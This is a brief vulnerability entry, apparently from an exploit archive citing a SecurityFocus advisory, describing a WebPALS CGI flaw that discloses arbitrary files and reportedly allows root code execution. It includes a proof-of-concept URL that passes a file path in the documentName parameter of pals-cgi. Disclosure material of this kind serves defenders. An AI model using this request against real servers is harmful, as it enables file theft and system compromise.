6 lines
No EOL
350 B
Text
6 lines
No EOL
350 B
Text
source: https://www.securityfocus.com/bid/2372/info
|
|
|
|
A specially crafted URL composed of a known filename, will disclose the requested file residing on a machine running WebPALS. This vulnerability will also allow an attacker to execute arbitrary code with root privileges.
|
|
|
|
|
|
http://target/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file |